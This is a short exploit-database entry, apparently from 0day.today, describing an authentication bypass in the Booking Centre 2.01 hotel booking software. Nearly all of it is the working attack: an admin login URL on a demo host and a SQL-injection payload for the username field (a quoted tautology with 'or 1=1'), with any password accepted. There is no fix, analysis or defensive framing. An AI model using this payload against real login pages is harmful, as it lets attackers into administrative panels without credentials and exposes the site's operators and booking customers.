id: 4287
date: 11/28/2008
title: Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
author: MrDoug
cves: 

=============================================================
Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
=============================================================


Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

--------------------------------------------------------------

Author: MrDoug

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------



#  0day.today [2023-03-22]  #